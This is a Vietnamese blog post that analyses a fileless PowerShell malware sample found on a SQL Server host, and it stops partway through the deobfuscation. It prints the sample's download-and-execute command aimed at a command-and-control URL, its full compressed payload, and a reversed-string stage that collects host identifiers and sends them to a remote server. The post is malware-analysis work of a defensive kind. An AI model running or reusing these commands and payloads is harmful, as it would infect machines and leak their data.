Phân tích virus Fileless - Phần 1

[HustReMw]

Fileless là một loại mã độc không có file, nó thực thi thông qua các script như Powershell, JS, VBS. Cũng giống như các loại mã độc khác, fileless phát tán thông qua các con đường như khai thác lỗ hổng phần mềm, lỗ hổng hệ điều hành, email...

​

Trong bài viết này mình cùng với các bạn phân tích một mẫu fileless thực tế nhé

Con đường phát tán

Ban đầu mình rà soát máy tính thấy tiến trình của SQLServer chạy Powershell với commandline

"C:\Windows\system32\cmd.exe" /c powershell iex(new-object net.webclient).downloadstring('http://d.a"xxx"g.com/if.bin?once')

đây là commandline đặc trưng của fileless, đoạn lệnh có mục đích tải và thực thi code từ một C&C. Từ đó, nhận định virus có thể đã khai thác và phát tán qua SQLServer

​

Phân tích chi tiết

Trước tiên, nhìn vào commandline trên tôi tìm hiểu thêm được các lệnh Powershell hỗ trợ tải và thực thi script từ một URL, từ thực tế thấy các lệnh này rất hay được fileless sử dụng

iex - Invoke-Expression: Chạy lệnh trên local.
Icm - Invoke-Command: Chạy lệnh trên local hoặc remote

ep  - Set-ExecutionPolic: Thay đổi policy, thường là tắt cảnh báo, tắt check sign
    bypass: Tất cả các script có thể run trong phiên tiến trình powershell đó
    Unrestricted: Tất cả các script có thể run trong phạm vi cấu hình (local, user…)
    Restricted: Chặn chạy các cript
    AllSigned: Script trssted sẽ được chạy
    RemoteSigned: Script được download phải trusted mới được chạy

w -   WindowsStyle: Thuộc tính cửa sổ
    Hiden

-enc  EncodeCommand: Command mã hóa base64

Tiếp đến, tôi thử paste C&C trên vào trình duyệt, một điều thú vị là đã tải về được một file if.bin, file này chứa scipt rất dài

I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f227ee156fabbbd7c3dff72917f6f6ff7fb9ffc6eabe6dbd5e2f47bf776beffc9c7ef3ebe936e7d94fe6ed4a43a6fd2cfd28fe9838f3e49b7bed7b4f5d98bcfbfffbdfaf4f3d3dffbfb8f1e2db2f6647efa7aeba33b1fffde1f7ff2fd7bbbdf9b15cf9fe7f3e677fbe4fbf4fb59599ed2efe956fa0bd39f49ef3cbcf7fdfa787ef2bdd1c73f7df0eae3d36956becc5f4db7d34f1f9acf577b3f283f4ef3e9f1f3d5e9abed4f4dfb3b3bdae293873bbbfadb83fbe6a37df389f96e2bb520d23d03fbcede81b6dbb130f6772db407facb7dfd65cb82d8dfd346a38f5f2d7eeac1fa630f7a7ae7e3df38f98d933be91d1a1190a71f23faff77ee35f4ef564e435ce5afc6f8f6a7160f77dfe2eb3b3b07df7f95cda7dffb64f7befe02ccf9b7ade09557b3fa8bdf4b217e777fd985c8d830442281007af8a9fe7260207e724f7bf340d33cf047dfff7c59bc6a1bd0d736dfa5e61f7ff271f0ea270ffb30f67b30761f18107b16d8aef9ed7e1f0261fe4b40bccfafabaf9ebe38c58f1fc3dffccf2f917f7ff17cda66d35ff263fcd79df3c5cb7b6fbfdf2ecfbef7c9ec275eff3e9f9d2f7e217e7e7207effe7ebf1ffe4d9745f5d3dbe9ecaa69b2559b5fd00b5bd2b8d0c693dfbfa967b36c553c2ab34955a28534984c57d2a25daeabe9b832ed6c832a6c50f41a146103928065beaadaba5afdfed3e2a22a6dc383e186cb3abbb6ed1ef4daedda864d31cb6bdbf2d3618861c3fbda30d2703573cdf6879bcd9bc636bbb7a1db856db537dc6ab270c0764db3ebbaf530aee5c3696601ca07b3626d274f3ec917d9f2f75f2daa69f8f18b2fcf5ebf3afdc99fa44f89e73ec1ff19f04ffe1ecbaaf9e9314dcc5d6e57d6ebdf7f7955cdc03317cba26e5fcfb2aaa44f9e8eefb4cbbc284f26f977c76dfe226da7f94f4fbedcbeca5f6cfd98f0e66f9ccc5b628545012453fcbedd36794bba9399565b9d7e71fce2d5e99baf5e7ef1e5c9a3cb658eb69fa53edadaf0e9d9575f51a7d3f5acaa5f2ef2b6b97e5de7ed9a1a9dfcfe7bf796c5770585aa585c6d13976f1114258702d84ddba62eceb7b5dd36fd28f326dd3d2d5fa74d938371a7d917e33bbf245fd72dd0f88953929abc9c643435c5f8f7a78f7e719ad7f9fc4ade5956459bd5eb8be27c599d102aab6c76fcb6aeae881a3e425f168bef12429f03219930c5e717d39cca6f9052a22e663faf5964dba69a6fe76d515f490bfee713cb05faa1aa05f3c3fe945fd2c833f885f9f26d96d793a106a691d141774026619c56f86a55d4f5daf2da67abe217b2947f96afaeb585c779d2e652584e06ff015c0772de843868fbbbfeae27275fbdee50995b6c78f117df314cf18b7232a01759790ee4ce8ba1f75839a3133252f43ffc36d23ff143557e3de63618b4df087f07ad483de4b36a6a55666ae99c4ef377397f4cec65f0fa2121b5f38d21f58befdcd9028b90dc8eef6cfd9e4c64f749d0cb00cdcdec5a1cc6e3f1db693e9f9263525cd624e7824f5b676dd31331239177ee7c9ab617dba4ac2e967939b6c0b6d2d9322394dc089b6591b5cb6ada56cbedd4d7deb3b2c20b5be97961c1a67762768fecb223d9d67c4a92579deb2bfa23fa5a93abb6da4e1feeddbfaffa9b10a756dbe9329b36653665d277903240efec6eb3d561e985a9de1a8ff1e37b16321b70bfa3dd9d9d079b3a30c8691720304d00c9ee12cdb91dbfbe6116bab3d9fdbbafe0ecbcb1d2fa31fbe7fba827f816463bfd2c6927721dad8272480eaa22d76450e9d8162c19ea1e75c40f9f7ad217f43b2c24fcd6ff0b64c48ce9fd44c4bcd591909f5dd13838d839d8d48122e5913f2e1983a4ffb9118cdd6656ff2c0bc6372115bb4352615cfc8e58f0c7343de63dbfe7885c104b2fc80b4de5b59f3bc1e8c738b7138dc87b3f54e178f8e0dea7bb911efa78790cd0938f3d16908d73e00dfb67471e7e240eff2f1287af290d3708c30f43183675701b51d8fda644417eeb4ac50d6231a3f0165924fb39fe1892184a8afc7025e63622a3bcb91b9516272e92d049bdf192179702625b5512a23bfea52c443da137ba72c4e076b7a31f7344e5a03fc2cff4ba7eb341ced1a42c33e576ef658fdfe3c24bb45cd5eb490a1cdf5f6869e4ef29b71a92dc2cbe4ae6f7135e7de99bb7631b44776f6f93e00a461ef1e31ede06f27f73325be7d4edc44ad944b38c5d49fefe92759565a99bc5b959fc1c4833f14b4c46bfbfbb3d1eef6d7fef0e0beb6c31e5cc6aba4bbf6da7e167fc5177b4297eddf6447855d0d4aeebf21735cd02893a4bc5514f72eff448c7d31948f0564c8273621c80faac07f217dff9e413004d0f251bec21da9684187fb5f3197e6edd46ce79185f43d2df53cc6f966f9982f7136f79e7872addf7eeedc3491d36cc5ed67658bc43aaab0e7c1f39b72b3bfe37faab1ff4759f1b1b9846372677cd1368945b38c770257f7f0c94d62e7e585ae2c641a47eceb72dd2b6baf8fe27dfdb105c0f3d80a2d3499e8364e037a47efdd7c499b8e0159d8eebcdf4ba00c114e46de0fde23b3b2cb5dbdbbc14a06b455b7959cc6fcc61dffbcc7fe7a6d6ef33fd3fe499ff3127172a8d58a421955dae2f5343d5b459e494d0b2c8f6a7de03f38bef600a3a46c64d17def9fcc917afb7f3b7d5e5f2ec33b308e363d1d1c3a21c2c3283ba58ba378352f5700b7de0216f7ee73f526177e5f7f460923b12c4c76f15771392408d16e7de3bec0ba89fa5d23e0442362e4f7de43af83cb8053e03e830b4348d22f4a08f90ed3c640f6af83e8c91a6bff80ebde623828f9d75dca2797efde8d1f7a7cd83ddc5b861bf61fa9a7a6c9bec84f8e0e5f73e93f7ddcb83dc42b8bd1f9fa852d2bf6f6414219d583f718bd6eb97308c94f95dd3420b3ec7aff097d8c721c3bfa866fa8dfc91cfdb88df74bdaaa6da91cad3279f306cf1684ec67e177069f4cb1d9a35fed5ba35e67d688831fe49f365149f603ed881721ed4c938c09c7d2875a260d67b7e94522e4a22ee18d8ab432604e2489066885d059eafdb9187794a60eae479a0e3619fef1a9e8cfde6ce35c4a8ba83eab299e3331adf66e75095d0cf968f18b8886a8d6eeb2352301abcf743f513efefef6f822f2879e48ffb891bec810c17ff5a7fc3e2f819236922841047b0027fbbf3198f8489e780fd12f951fdfe8d7de5b31082f64d2cefd6193f535d6bfeee3808685bd9fc9b36eea4b0b88dc6ebda228895f9fbd5cc87207f05efabfb64005cf864e6162ab006e1ee882af6ccbd162638d436959893cf3cdb6258d51a34fc557ce3f4330b56dad4fc1969790b42df40e71bc87c23956f20f20d341e26f19d1dcec581c559a77b0cab996d0e987fff3a6f975e9f3235da7cf733b4d364816da93264a1d2f79f7026e4708f25867fdde1575962d0260090ea7c931de12fef6cfd9e415868e620f29d923ff28d523e066f31f0852a161e2ac77034921d7a443bdfc91745fbfbb346a156db77a0569adf5d944bb6a8ab675f514ea4cd9e6eb7f9e75b5ba0061383fb510a4b00814f36bdfc59d0115adfbfbff79955503c637e8ec3d211df10ea32b3a6977993cd578b1c6f72779f7d92e223316e8637bc46a18d714dd9b4a0b56643d32f9ebf79b1bd2474bd97155c9842eda44f7f63c152bd6e87ac32a389d781ec6c36f3d0f69d0dcbd53c0da75f1cbf7875fae6ab975f7c79f2e872999b97e0d3080c634ad95aafabfae22de57537b4b95396ebe5d64083dd6d16256e481f7fe71e9b98adf32fdfe5b3e5d9386c2c7f85540d1c2cb5d918ce2183e45e4770ca1e71c3a7dfc2ef5bf9342b57f9abf19dad050571e37c5d6697dad767f2c31245ba44f65a50b1867e80cef3f97c803d0c7f70838dac7113d406edbb931783eb35b434a4f1ef4c1f1eec4c77f20726ebfdf0fef4de83c9eebd8779f6e9ee6c273f9f7e3adbbd677d5901ed53d7e1f4085da4d4073e1aa23df87b03e505d267f2c38e48fc5fa2bc767f13e5572bc892a591951b47a21d51a2c637e4f6d631e4bf3ae4b33036f0b3821998b810a919af7f7467ee7dd1f2a0bc1f62bd79d11599971be646a07c263f2cce82153c60e9e4a6b95973c864c8e02202470469110ed4b5bba5ba10201b68a20d06262bc4d20b0037a3e935fcd9c3b33777f9225b52c75f857347c146307d02e833f96187b130496eed2798be43d6119f8c1f2d553d88e2fceefe129f8f1c076f35390ccf827209eff28bbcfede67aa3a03282cfbb77999e5bdf3b265d0db005016058034b5202c9d6e03820923200c208feefc2f4fa4151500bbfe42b36c5886f1051c007ae2809f96e39ab9d2d8e3bbc066e884350336c3b7197de8cb41a153b0dc6058e6fc00789f195a751405b6c0122fd71529a49f78adc3f87d7676eeb3d94063d76acbb23145b1f7ecbb442d4fe37f7fc7fb62e9f12bcfc023a67b5b94ab669c2f8bd235d5df2ca6d7595d67e66be271af75c8e8690adb4810fc37aca4a3bfba6ab3ba6d8a65b1981d3321bf9f97d5abe5595b16eb270d658297c577c765a6a35f15534a0abf1c5f536cbc9ee6afbfb725ad9bb3f19d3b5b9420a66cc10979a5c46fd484fe9e9d3918bd97bf6f3fdbd0485484ccbcc76cc4f42f14a9317ba231ad9b225578074da5cd0dba97a4a86dc55f65a9d94e9f9ebde637d943b75c77873ef925fbbf7846f2c60aed33f7a21297cc9a3ac8343d0c203513c3f3cdfef9f41852fbfbefdda39143aaca936dcdaa178bef72604033e7fbcae80b49a396a68be7cacb53c870918c5499c43ff7d2559e97cd368707dcc4ac51cc0c4cbba430a701148b02ea81d5806bf759fd0bbda5035a3568b3d9184defa25db0644021cbb3810583310da4b97e2d23ac68dd6029eb06dec000138e565ab5b468dbf2103b43d4504be35387a38da0eeecefdefb74f7fe9eb87522ccfed85242e34c880bc10ebea2df5f6eb74dfe66eb7775c1576a9668d00d3e80f41b0aa8c6fd64b568359480b83a903a174a63a3679745f5d3dbdfbf3f1eef7ceffe6c71cea90b8fc26612edd49c9f715a8bbefafe39e970b68ef2d9f39c3028b309e53b59f39bd0f15ddeaebf409e6b46e49abff1166b0ef34656ba3f73504d8712e11a97fa11c3bdd05168f46b6291d897d66beb7c49165b00ab17117e8d3c291338fcd8d0eab38949f0c4bab4d933f7e5f7bfff3d5eb86abee79ad924d150336ab8ffe9a4cd26209eac7bed7f4a947ab2a8ea67a4ccda3abf5c5627df2358d4e8f7cfdbeb89e261ba509bd6411223c8dad5a29ae23796ab77559dbfb37fdddbdb9dd53b44b8dff3a5fd0ca949fb47b5c867f68fbc2eb2e242b394fcc9ee8e7120ec47c4c0adfd0324b77f3c7ffed50bbfe7a02563d201f5eacba7c7af4e5f7e693ff8f4fe3eb53bb67fe3affcea17d9bf0f0e0e604932d760ffdebdbdbddd5dd76267678fd252f66fed937864e57f4c70a793ece4c9b17bf181749eb9def5dd55e6debb38cf67f4a2fddbff1d5d7b4def7b9850f7daabd7206b823fecafedfd7a3fbf77b5f78bdca8b215251ecb7c414b92e623c5d6754fba906cb063846ffdc2dfef77273ef9f1dff377b51f111058bf957b6759cc9be5daf5bdac2eb27ae6fa7d68c8623fb29fb89e3b93d4c39e54e6eecede7d07b503b2072f9cd25df3d84f0ef4b11fecf4f1a4dfe57ff693d4fe9675f9eab8fb81efb77824be94851f01c28ffd138c62ff584e2ea7ef7ee0debbfa453e22ebeafaed747d6eff7ed75cedfd20f308b6a42c5cbef2a6655515eb6b52121e86a40c26a44126f683cef77d69339f3834a963ead7fe599565ee188c7c8e265bd83f458df863448edbf59ebf5d56ae350d11c42abcd7ab2b4f07019af7e7d3573bdf7dfd3af8e0cbf0839e16d30f1c3e32baa04515b6a039f83d7d81c5a4ff9e8138e393e003d113de987d76d8ddbbb77fffd307070fed277d36ec7dd0fdfb3e3f0e669fcfed9f7bfcd83f77f871dfeee23ffbe7a7fc74700dbaf1456cef5e4776486305580638077fd0bbfe8bdee71e6aee53fb1b69b369995fd9bfc1d06d5539b120cdd5111ce54137c50ff9f1bbff3d6da4e1e6cffdd90b474ca3f0839f3afe89df3510486ae141f9bd5f7ff7f70cbe263409591f538a4ccaeac2fe493cf47b7608fc7b16f955b6feb6fd88291c4870cf1e99e1390e24128e7db82236c75d19f0a496fc88453359cfec07e35e37e7b3c6f5d0aeabf934ffc1f4f7778399930d71ba2db4f21de6666cc5b4898b26f9c021374973053de5cbefbe3a7dfdd5b4587c77838f65bbb408c441696806483148bf44dc2ef1d3aa3763f98528f76d38e0cb9a9ccc575ec42891eedeefcde0ed4be4c33d81b737a3159dd57108e3fbb3a2fac9ef692c27301ab4b75d9ca5e6758deb9e71ab9ab88ac26681356edfe56f82a8871d701a5ed097260d14d59d74b49853b4535d94c7df7e890e08667159d52fedc779539527edeaba3e7902cf947f81634abe75d6be7ef3e2a58d420524f99b3f450d2930689767df4b4f5f6ca79d2ed2f3339f5c404cbec06fd715913d7ffa611d3a90a62f192b0768cfc7017147e15f213673b0cab31b90e940c77bd59b8c16cc2cc0ce9f021f1fe1af5b4037b4525ef31313660a49417ff02c2a55df671e7d54bc256b7ebedeccde844438b7369ef760a4afbf7a73fc867ea7d0b8b84a67145b67e7fc1ead62e6b592012f514c5ed7a71cef7f57c6a03cb5c35d79302d2381def4bf0e62b18f2ca22985d1afbed793b42e421b39e0c6f9ffc6269f18e97de7ff56f4ef61458af0cb0f9e0acaf273979ca4d87ffa05e74a3b0411faf7c9e210d848fa0e213e13e6b6b36bbe88b70d3109da7eba9b7eff7bd03da1b64e535f217d5f9ac81b77eed4bcecbec52d5a9aa9fcf3713eaba6c5f22bea15f9976aba3c654bf0bd2d8c9c13054efd3094df1334723ca57cb4a3cf3b24485ebf3e3d39f9eaf5ef2f13f9639af80c449356f5d7e9234bac74b15ee6e9b42827eb55c09f3b7b1edccf8f9f3ffbfd4f9f3f397efdd5e9abdfffdbaf8fbffdfbbf79f9fbbc3a79a2ec373af0b1e0d627c75f7c9b5e79fa82da7efefcb8d37ed76fffed9337c72f5f9f3dfdfd7ff2cb572fc386be5afac560f1600c1759f9ac597d49b394f686f17dfe568d331652f8efab59ba778f6692f2d7984ec5a65daf966793694a70239faf64ba27e9f739a37efcf2f9385f5dbf99e517190578cbafb69ae39292e675f6454a6f7c69df663b940ae7a4dfa76fd29183ddb3526e4690257e87c1d0df4d3826f650ca7236c63b538e19b7daba5a2dcecaf2e90f7bacdecb9b871a1acc6f74a037d338b05edf68df9b889cd7b42641541efe6e65b12eb36555b4ab00f591a8160cc08372534b07b3c787f62b0a04c2af55d3a9ae288f3793d3377cb7a366d5ae8f29b1ff9a925a27c88bea6f1a2b7e0895ad8e9ea7f500ca9b4ceaedd0df882614d26d30c5b4d18a52bec84b7af307cd4a7cfb66604a676784a9df2a3ae8c129dd64316f37e80f9833b1fea6335a44981ad84ca5269f169775fe7a451697701fe70b5afe5bbf32f10f0db8594b4b1843a26fe49bde27308cbf670a42923e3dcf9f42656da7fcef6c762c6819138c55f8ed65fe39379f2ed7e7f89623c5bc2933ac78486458c3e4f077e6175d34f1be36df9033b3dca659d83d2d5fdfd96ddfae7e7f8a16b937faf97abcfb765ae12fff15a0635bc12d98d08ac7f8ecece4f571cf23a019f081fa603852fecebd06ff3fd83e6fd79fa91cb779832c727a38839f41ab5bf57a7b41eb8adb575757dbefee3243d2bcac56d923a6133127ad789e00ceb7ee7e2b7dd4ae725a78c49fbbe3fbf7c70fee1280297dbccc2f8eb7b11ec95fedec3c78f44b56c52f06568f6809eedbf2c2eedd976fde7c3b3dbcb3b7f7bb1fdea165bcdf7f9abfc3aad7167e8eef6ce9ac63c886012e965939ce2eb39fa677b6083dca71bf461ef335c565e3bd32bf5c8c29e99dd7f99c722565d554f4423ba6c4c96779395b66f35fb84b36ea2525a3befd59994fb2e7f4d7eaf7ff8598b3cf26abf3e5efff7b941958754c0bd10d2ded3edbbbbff7bb9fda7fee36d47e51dcd56fefa66f4e3f67ef96920c6ea27ccaff12ff0f34fd250ff67ef7d9624acde89711fd7fbaadbfcc9bbbcb6272977efbc59a9f789dd2baa6c2f7c863401ab0bf9858324f6fd1d35dfd853efd1abdb08ea357c1be20392dc05d559c6a32ebdbd21b2d9efaefc9b2ed78977fe27bf0698cd5c126a315962fb7e49dd5f4cdb869736afbda5ff27d333d25f6214ce9dfedefd23fa72f98f52dfc1ed27776c6b4b0b96bffd9dfc518f6eddf7bfc0f7f782ff621bfee7de33efcd47eb3b3bbf5e8cbe7a7dff6e9a1ba44e8a181977ce6adb51b5403edb0c50668ec918949f4fd3bbbdb97d3bc0654acf74e96f84dd4ffb062f84cfb3450e4adfcb2c8a7f92bdbc767a9426645788796b3d2d11da8cc9cd7a4799dfa7a821f5b5b2462640d966762e6a943f602a181187674483d7dd71d9cafa41eee3e7ace5ae2fefdbd47af55c1ec8df776d37b9c7dbc852eeca842614566459f133b48382dded7f296a7641ddde2fd617c1b675b5ac2b6bfdf11b1d22e209d53acc5dc68997e2c1cd0a05922bf7b46ecb8c2b71cea93b6bf8be5a07539bdbb7b79b7b9bacb4ccdfd837157a4e459e2985d7c50ac767ec92fc10f5516d4c0fcf5c87e4c3182ae61e3ffbfd87ed10c7e33cd570dd9936541ee5135dd5e64e68b91f9e5c5abe3dfa7d713d9ac76db3362bdb7f245b6a4b5ac1896f86ae3bbb362e0cd59117bef17e39fcf7c627b8463414303d224f87564fe6679cba759b9caebb1d09348afbff800ee7cfabbdf595444c057db6dfef9d6279f6e116badab134aebd84f590e69b1753c7ef0f0939d87e3f1fd4f3f79707f3c3ed8dfa244041c81ef6d2d8beaa7b73f7374f13bf9febdef59443913d3d2089bed541861eb334311ff9d5f4c2a2bcd97dba97bb3471e1ee4f997eff2d9b2182b30519a86a9f07f664eef4d4aa82cefde965905ea8fb148b060a84e5451119dd7d7ba96bc1fa47915fc4d7ad728de0fd0bc02a3ab775f7654aef6645c96df5f3fbe9d5205ce366de5748c3f5b50d73c0b9f7d62fd22d389696bf92385f7d2030139a1d6c61e70eebdfcfdf5d347928af7bdd165d5fcb4efaea681bf7a6b64ee586603cb6a77e045f5972303fdd6adfde083839d830d7ef0bccd98b86f5e7ff952101ec417fd0b49c68a235281018d52f6386c6bf5c2064c9f69d59b06c6233419e66bcf0c9a8fee6084dfa029b45da939b47fdfd1418e9466a64f1577631935a4f3eca7d8cf659d5ddfd27cf2bfa1ed14a66713b1ac9e32859c37e7bec4dce697b21a6a693d23a9256d8c39754a2978a599c0c4d5d3bbfc4f5955abe66e9d5dde4deb62462f34e94571be1413790ba8f7d2559e97cd765b93d6f860dc0c472cc94a99ffab29fa96feb77bf75bfeb79687deedbd03f6efd9615b55750a5b446b0ce793af317e03e81b21269abd5b2f8b32a5ef79713bad96f4fbba7a16e5825f7c67276d2fb665951b2f3e7fd454f87debbcead8ba00d9ea7c59dc8cd266a9f6b9b7c3d7829b48af1882870fee7dfa0d88ad422661f57adfc5ca65c4d67e4d83bafbf52ceaae5ad49f7d8b8a6fbea61d35c9a791b1c7febcdfa4d39a62463ada576aaad69a554179bd0aad7dcd66e6c77dedf1af4d58c2859c8e5d9b4fc0978ff8d3141fa5489690b3952eb3699352eea4e2f04cfd82d0adfafe2e63fbbdc66318d34e58459c36b2d3aec31fd3efeeb8b7a7f992649699957f3d991161a3c08556e479e6da32d28c961b0bd7b2b9ce7fafb1fb32a5d50f79636b3ea5c9a8ce7db5fa9ad5eaeb60b0662cdfdff91eaf780674fdaec589a5af337c5f8abf3f341a377abf95fdd0920b0c8b29373f314f8e61941ccbe2227f12688f3ea48d0a2158d9ec531e9ac09136a75c5d3d9b654ad708598916bff8f72448c180fc8f434d433cb1ad0caaee99d7c5f7fcfe986dd3aa4df1f3139a9bfe978baa3e1f8fc74a27e16b3035ebeb41d5aedd7bd08c32bfb3c5285b46febe66db1a5deb15e1f35eec3418dddfdf0751ebea25bea47538f97c6b91d5d94bfe35fdc58c61994d3bd900957ca0febbfeaee4a4cc52ed866c87e42bbdf1080bf2bfbfbfa1c698e9746fb26e78967ef1efcef9b2fb7ba4a8219ed5efdf00daaa78546693aabcb033f263baa85ffdfee655ccb48563671b8d5c9b1f97978496eee32d4fd7f06729c579eb6a03fec6a80562c5affefecb8c73158cbce9c0f2e99da04da35986b6a210c043c7ea09fce59169f2fb875da4fe9f812848679f7cc28439fcf4fe5eda96dba9fcb5f3197762a8d3071aa1b937f4b744d8c92fbec3ae064514c08c9478889c0a0974decbb3c9fa6553f09898f87728d1468bfc8be25df6859f32d8fa6467cb1beb9d3bfb43ed76a51d4f0fd00da9204357477a8bdcb9b93f73777e494abca7f8756660553083830abfd8281ce4f7bf9b8229d3a24f1796bcc8e73ff663bfb1f0458cd9f786983d0ac870bb60ef33bb8513aa36c7eb3eb36f64757502bbaaa7c3debfc470b145e293f4cecbb3365f4ed6af0d317c8e97a94865cdc0fced096ce4f55064742e5f9ea1b5cf48f24dfa8bfdf731973aaf6e4aedb09dedfdfedef75664540405c2c14e0cfdfefddd0ddfed78df7d967a3d1b4b685b6f215bf57a6c9adad73c42e2674e8e3a307523e55c0c85f57be6ffec38d2a2e955c371d5584851579ae4da19f37f37b41a83c51e7eba7b53b3077bf1264e1f19362449296149c086d22460411d6654497a42462c6f001912c83251f546acc8f1cb3343c44f3ce9b4f432846f9be279cce4a782d533d38e592c80c36c84c781381e1b97865605b317d74f903e21bd43cef5eb174f3d9f84bdeba0678317547084045[...]c7efab4a400f08b9dfc0a63fd092201c5f557b3273f787a51d167ab675fbd5a9c1eefffde6fdf1d7ff55571fad54f16bf17a98d67e59bcf77e6d32f4fd96f7d4373fe966c392d729efd3e2c61eb8bfc277f2f5a1f77214431d9fdcebd302c209bb7daa1d0e0ece48bf5e94f2bfbcca6effc68c49add9f9c7ee7075f986863fae29e468cdffebd3ffd62efcb9223c2dffb3bc5f1898261eb7a71f1ed192dedfd5e1757df3ebfb8faee6c7dff6960572edea2f76fcf7e0050145c193017079f6764fd286e2d5ec14b58eefcdebf179bae9ffcee647e7f31259b32bb82693316f82bfdfcc5ef3d334123d607ef1edf9bfea2fbc507078864166f1f232a017e142a7ee3a1e28f62c4ff17c5883fa41851a5e987182a6a8f3f8a18df3f62dcbb6dc4c8012311792bddba433fe87fcbe2cbef6c7f7f6fb4bb3bbaf7bdd32fb2e5185f7cebd56cf12dfa999e969495a88f2fb7b6d25ff831fdf3513a4a3f1e7f3cfab83efb7cdebea948433fa7ff9f9ed33f6f3e4eefa43ff3bba7bff877fbfdd35f72e7938f7eb7adb4b94c3fae9ebdfe38a5ffee7c445fffc6c9ff03'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

Nhìn thoáng qua đoạn script trên là thực thi một đoạn code (lệnh I`EX) đã được mã hóa, để có thể giải mã được code, tôi đã sử dụng một trick nhỏ ở đây, tôi đã bỏ lệnh I`EX ở đầu script đi và thêm vào câu lệnh để xuất đoạn code từ memory xuống file

[Text.Encoding]::ASCII)).ReadToEnd() | Out-File -FilePath "C:\dump.ps1";

Và đây là code tôi thu được

&( $PShOme[21]+$psHomE[30]+'x') (" $( $ofs = '') "+ ([strING][rEGEX]::matChES(")'X'+]31[diLLehs$+]1[dIllEhs$ ( & | )93]rAhC[,'j8R'EcalPeRc- 69]rAhC[,'p2zl' ecALpER-63]rAhC[,)09]rAhC[+901]rAhC[+75]rAhC[+94]rAhC[+701]rAhC[(  ecALpER- 29]rAhC[,)28]rAhC[+001]rAhC[+411]rAhC[+77]rAhC[+57]rAhC[( ecALpER-421]rAhC[,'RmZ7u'  ecALpER-  )'

) )j8Rp2zlj8R,j8RJ3sj8R(ecalpeR.)j8RZm91kj8R,)08]Rahc[+15]Rahc[+701]Rahc[((ecalpeR.)j8RRdrMKj8R,j8RW4nj8R(ecalpeR.)j8RRmZ7uj8R,)94]Rahc[+96]Rahc[+801]Rahc[+38]Rahc[((ecalpeR.)93]Rahc[]GniRts[,)001]Rahc[+18]R'+'ahc[+38]Rahc[+98]Rahc[((ecalpeR.)43]Rahc[]GniRts[,)17]Rahc[+121]Rahc[+111]Rahc[+58]Rahc[((ecalpeR.)j8R}

GyoUDNEGyoU



}

}{hctac}

)fmP3k]tnI[+dQSY=fm&dQSY+)GyoU^^GyoU nioj- dwssaptegP3k(+dQSY=im&dQSY+b_srddapi:labolgP3k+dQSY=bcp&dQSY+tnuoc.o_srddapiP3k+dQSY=ocp&dQSY+tnuoc.i_srddapiP3k+dQSY=icp&dQSY+tnuoc.]1[nepotrop_cigolP3k+dQSY=8cp&dQSY+tnuoc.]1[nepotrop_nrayP3k+dQSY=7cp&dQSY+tnuoc.]1[1nepotrop_siderP3k+dQSY=6cp&dQSY+tnuoc.]1[nepotrop_siderP3k+dQSY=5cp&dQSY+tnuoc.]1[nepotrop_pdrP3k+dQSY=4cp&dQSY+tnuoc.]1[nepotrop_hssP3k+dQSY=3cp&dQSY+tnuoc.]1[nepotrop_smP3k+dQSY=2cp&dQSY+tnuoc.]1[nepotrop_bmsP3k+dQSY=1cp&dQSY+yrterP3k+dQSY=r&dQSY+camP3k+dQSY&dQSY+diugP3k+dQSY&dQSY+eman_pmocP3k+dQSY&dQSY+NOISREVVP3kj8R+j8R+dQSY=V?nosj.gol/dQSY+lru_nwodP3k(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-weN(


htapimimP3k htap-tset = fmP3k

EMANRETUPMOC:vneP3k = eman_pmocP3k

DIUU.)tcudorPmetsySretupmoC_23niW tcejboimw-teg( = diugP3k

1 tsrif- tcejbo-tceles 1ElS sserddacaM.)}eurtP3k QE- delbanepi._P3k{ erehw 1ElS noitarugifnoCretpadAkrowteN_23niW tcejbOimW-teG( = camP3k

{yrt

GyoUgnitroperGyoU tsoh-etirw



++yrterP3k



}

}

}

}    

}        

kaerb            

}{hctac})tP3k+dQSY=t&dQSY+pirrucP3k+dQSY=pi&cigol=epyt&dQSY+NOISREVVP3k+dQSY=v?nosj.troper/dQSY+lru_nwodP3k(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-weN({yrt

Nhìn vào đoạn code trên, tôi thấy nó vẫn đang bị mã hóa, có thể thấy con virus này che dấu rất tinh vi, rất khó có thể phân tích. Tới đây tôi đang bế tắc, chưa hiểu được thuật toán và chưa tìm được cách để có được code sạch đẹp của virus. Tôi sẽ tiếp tục nghiên cứu và viết tiếp ở bài viết sau nhé các bạn , bạn nào hứng thú có thể liên hệ với mình để cùng phân tích nhé

Note: Công cụ phân tích virus Fileless